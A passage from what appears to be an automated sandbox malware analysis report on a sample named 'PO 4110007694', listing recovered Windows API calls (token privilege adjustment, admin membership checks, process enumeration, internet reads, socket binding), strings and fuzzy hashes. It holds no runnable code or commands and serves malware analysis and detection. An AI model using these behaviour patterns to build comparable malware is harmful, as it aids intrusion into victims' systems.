                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 99427753-0
                                                                    • Opcode ID: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                    • Instruction ID: 2b89cce08ccda2a730cebbc1b01f611f1903b4e164b577d9b948587c5ca656be
                                                                    • Opcode Fuzzy Hash: e77e678e5c431168c6848c83fdcd160622861e3e58b6f011e03c94c594bd059f
                                                                    • Instruction Fuzzy Hash: 4941C575A00210AFEB50BF649C96FBE77E8DF06714F04845CF916AB3D2CA709D41A791
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                    • Instruction ID: 8b203d44bf1f9a473420d631c9255965b50e4f7a2fb5e1e3bc6b69ef8f4ebb65
                                                                    • Opcode Fuzzy Hash: 7899c5e53040de2c8f29f76f3021a89cc7352dabb5d27515e0dc7ab43af19801
                                                                    • Instruction Fuzzy Hash: 2511C4317009116FEF225F269C4CB6EBB98FF457A1B514029F846D3251CBB0DD42DBA0
                                                                    APIs
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C680C0
                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C680CA
                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C680D9
                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C680E0
                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C680F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 44706859-0
                                                                    • Opcode ID: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                    • Instruction ID: 0a5a7d7a702a65065b2838e2963de37bd3e059669c05e5b2ac29440ef84eb5a8
                                                                    • Opcode Fuzzy Hash: 460b8e35d204f4e8c5a9c1c25a9091005a851e77f1d0ac1a57ff2e057eedfb9c
                                                                    • Instruction Fuzzy Hash: B8F04F31240204AFEB200FA5ECCDF6F3BACEF4A755B10012AF945C6160CE619D47EA60
                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 00C7C432
                                                                    • CoCreateInstance.OLE32(00CA2D6C,00000000,00000001,00CA2BDC,?), ref: 00C7C44A
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • CoUninitialize.OLE32 ref: 00C7C6B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                    • String ID: .lnk
                                                                    • API String ID: 2683427295-24824748
                                                                    • Opcode ID: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                    • Instruction ID: db55e488c00ea5ce46104be45ec34e7dce1a7f0e438d3c71556770bb11f70a67
                                                                    • Opcode Fuzzy Hash: cdb5c5f84761c704a59568a207038bbb1f0b297802a92504e17688805b670942
                                                                    • Instruction Fuzzy Hash: 4BA13971108205AFD700EF64C891EAFB7ECEF8A354F00492DF155871A2EB71EA49DB62
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00C14AD0), ref: 00C14B45
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14B57
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                    • Instruction ID: 467433ddcddb43d5d12a5ab241ff1ea7b92f8faf38bd3e16a0a4d0c4ef51cd1b
                                                                    • Opcode Fuzzy Hash: 5de7587896e9a3bb1b40bec1e52894a93895a72e1e36ea30f48f3622371460a1
                                                                    • Instruction Fuzzy Hash: 90D05B75A10713CFDB209F31EC1CB4A76E4AF06351B15C83ED495D6150D770D4C1C654
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: a316410fe8f4477c9c0c835502e88197aa6ec9ab77baa1c83b7f83ee0d5213f8
                                                                    • Instruction ID: 28faf56152c12a6c3a43d4fa97f573096a5d8bcc3fe2d6c3a8ad7f35c6960c31
                                                                    • Opcode Fuzzy Hash: a316410fe8f4477c9c0c835502e88197aa6ec9ab77baa1c83b7f83ee0d5213f8
                                                                    • Instruction Fuzzy Hash: 9E22DE716083509FC724EF14D891BAFB7E4EF85300F40492DF89A97291DB74EA89DB92
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00C8EE3D
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00C8EE4B
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00C8EF0B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C8EF1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                    • String ID:
                                                                    • API String ID: 2576544623-0
                                                                    • Opcode ID: df6eb435727252b051856ca4bb9bc8549c01c4fb2fbe4232dcddada218b3dfeb
                                                                    • Instruction ID: ffff89db88d2ed6d9351d78d1604a5f53796d8163a6063bb9a71b03a4003441c
                                                                    • Opcode Fuzzy Hash: df6eb435727252b051856ca4bb9bc8549c01c4fb2fbe4232dcddada218b3dfeb
                                                                    • Instruction Fuzzy Hash: 77519D71508301AFD310EF20DC85EAFB7E8EF99704F00492DF595962A1EB30E949EB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID:
                                                                    • API String ID: 3964851224-0
                                                                    • Opcode ID: b907d2ebcd9c00bdc80febf7880b04901c3d5d6956a220c05fcb53f46ab5d509
                                                                    • Instruction ID: 8ec83816773ea3a7c401f47d3bc0e6bc01f1944faf58be5f7ea98137422a83b5
                                                                    • Opcode Fuzzy Hash: b907d2ebcd9c00bdc80febf7880b04901c3d5d6956a220c05fcb53f46ab5d509
                                                                    • Instruction Fuzzy Hash: A5928C746083518FD724DF14C480B6AB7E1BF85304F24892EF89A8B762D771ED89DB92
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C6E628
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 85f609792351564b12c4efd0ebdc91afcceeb370bd9a382d7f5e55395d4a06a6
                                                                    • Instruction ID: f331bf1721dcd2f987d68694635aaf6e496811c44356d9c77c04c2b8a52fdfd9
                                                                    • Opcode Fuzzy Hash: 85f609792351564b12c4efd0ebdc91afcceeb370bd9a382d7f5e55395d4a06a6
                                                                    • Instruction Fuzzy Hash: 94322679A007059FDB28CF59C48196AB7F1FF48310B15C56EE8AADB3A1E770E941CB44
                                                                    APIs
                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8180A,00000000), ref: 00C823E1
                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C82418
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                    • String ID:
                                                                    • API String ID: 599397726-0
                                                                    • Opcode ID: 9c021c6dcfce795d7e790357a464de86568018f481b1900b03a2d82e54928c51
                                                                    • Instruction ID: 3f8c57eabcf3d54fb7e8636271d3fc55b57f78343de2e05f1c381104f9e000ed
                                                                    • Opcode Fuzzy Hash: 9c021c6dcfce795d7e790357a464de86568018f481b1900b03a2d82e54928c51
                                                                    • Instruction Fuzzy Hash: 3541F871504209BFEB20EE95DC89FBFB7BCEB80318F10402EF651A7150DA759E41A768
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7B40B
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C7B465
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C7B4B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                    • Instruction ID: ca1a654c3f50efb31203003f85b3d8a172917858be0a96c3fe1e4fd90384c9c0
                                                                    • Opcode Fuzzy Hash: df7b43f5235fa8eb3d8722f635050ee484cc59204d6761af7691a888c5138bdc
                                                                    • Instruction Fuzzy Hash: 6B215C35A00508EFCB00EFA5D884BEDBBB8FF49310F1480AAE905EB361CB319956DB55
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                    • GetLastError.KERNEL32 ref: 00C68865
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: 4e8543acb118f845301ce5a2ec337ad314a3cad73a18a429ef4401f03e7d0f31
                                                                    • Instruction ID: 37dcf173fd9ceec79217a9cd9bf39346ed3ea90bd086863c223b0f0c05df18cb
                                                                    • Opcode Fuzzy Hash: 4e8543acb118f845301ce5a2ec337ad314a3cad73a18a429ef4401f03e7d0f31
                                                                    • Instruction Fuzzy Hash: B3119DB2414204AFE728DFA4DCC5E2BB7ECEB04310B20862EE49583241EA70AC018B60
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C68774
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C6878B
                                                                    • FreeSid.ADVAPI32(?), ref: 00C6879B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                    • Instruction ID: f28e4b98b37d7a5a2e2241620705b3e1fd9f606da5009e3e62da9b99390255a0
                                                                    • Opcode Fuzzy Hash: 385f274a6caacc0bea90430656ee5af46be9893a17fddc523cbdbab58d84b68e
                                                                    • Instruction Fuzzy Hash: 27F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1045A9A901E2181E775AA048B50
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7C6FB
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7C72B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                    • Instruction ID: 9f0ef7098e9b14a21ea97abda16e79106b9ecb60020cb2a0770aa9e0b03217f9
                                                                    • Opcode Fuzzy Hash: fbb86a9003fb6e6e552e1e48e18276bfe773a1e24ccd62dd1bc2247758f96326
                                                                    • Instruction Fuzzy Hash: A51182716006009FDB10DF29D895A6AF7E8FF45320F00C51EF9A9C7290DB30A901DB81
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A097
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C89468,?,00C9FB84,?), ref: 00C7A0A9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                    • Instruction ID: 09033ec05b4d62a47296a232bc5f4b218581a42e7ecc9a97bd68132cedff9a13
                                                                    • Opcode Fuzzy Hash: 3eba7cb92c9ae13c1d908b7b42dce76238b982d8c098c31174c01c4906a68247
                                                                    • Instruction Fuzzy Hash: 7CF0A03510522DBBDB21AFA4DC48FEE776CFF09361F00826AF919D7191DA309A40DBA1
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C68309), ref: 00C681E0
                                                                    • CloseHandle.KERNEL32(?,?,00C68309), ref: 00C681F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: bb53d4c8ebedbbce5405257639ad5482e8414e251a5eba8dc95d9d638699db73
                                                                    • Instruction ID: 8fd92dbd591bd7ea2568feee38d9ab12a7e3a21b546e2e2ca361c75b6a1108d1
                                                                    • Opcode Fuzzy Hash: bb53d4c8ebedbbce5405257639ad5482e8414e251a5eba8dc95d9d638699db73
                                                                    • Instruction Fuzzy Hash: 4EE0E672010510AFE7252B70FC09E7B77EDEF04310B24892DF4A5C4470DB629C91DB10
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C38D57,?,?,?,00000001), ref: 00C3A15A
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C3A163
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                    • Instruction ID: 2b1b7b08e841003e27d8b5c78594a10929d94d6b13a1f19c30996b8a74d39391
                                                                    • Opcode Fuzzy Hash: 494a222a0648cce14168f1330f0500f275f8d33183b26a94f5000dcd9c738b0e
                                                                    • Instruction Fuzzy Hash: 80B09231054208EBCA002BA1EC0DB8C3F68FB44BA2F404026F60DC4070CB6654A28A91
                                                                    Strings
                                                                    • Variable must be of type 'Object'., xrefs: 00C53E62
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable must be of type 'Object'.
                                                                    • API String ID: 0-109567571
                                                                    • Opcode ID: 75ca4cf6667876d82d1dde3719db03b9e79666cdcde4da1286ec3dd14a6e4d25
                                                                    • Instruction ID: 254260522050af9f86aeff8acf93622cf9f34de2331f6c31cad867b07ce0679b
                                                                    • Opcode Fuzzy Hash: 75ca4cf6667876d82d1dde3719db03b9e79666cdcde4da1286ec3dd14a6e4d25
                                                                    • Instruction Fuzzy Hash: 18A26975A00215CBCB24CF59C490AEEB7B1FF5A314F248069EC16AB351D771EE86EB90
                                                                    Memory Dump Source
